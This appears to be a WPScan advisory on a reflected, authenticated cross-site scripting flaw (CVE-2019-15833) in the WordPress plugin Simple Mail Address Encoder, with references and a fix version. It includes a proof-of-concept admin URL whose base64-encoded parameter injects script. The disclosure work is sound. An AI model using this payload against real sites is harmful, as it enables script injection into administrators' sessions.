Simple Mail Address Encoder <= 1.6.1 - Reflected Authenticated XSS



Description
Reflected XSS in the base64 encoded fwurl parameter when the plugin has been used for 30 days and shows a donation notice
Proof of Concept
https://<BLOG>/wp-admin/options-general.php?page=smae&smaeaction=remind&fwurl=Iyc7YWxlcnQoL1hTUy8pOy8v

Affects Plugin

fixed in version 1.7

References

CVE 2019-15833
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2116080%40simple-mail-address-encoder&old=2010635%40simple-mail-address-encoder

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 3159
Verified No
WPVDB ID 9418

Timeline

Publicly Published 2019-07-03 (4 months ago)
Added 2019-07-03 (4 months ago)
Last Updated 2019-08-30 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin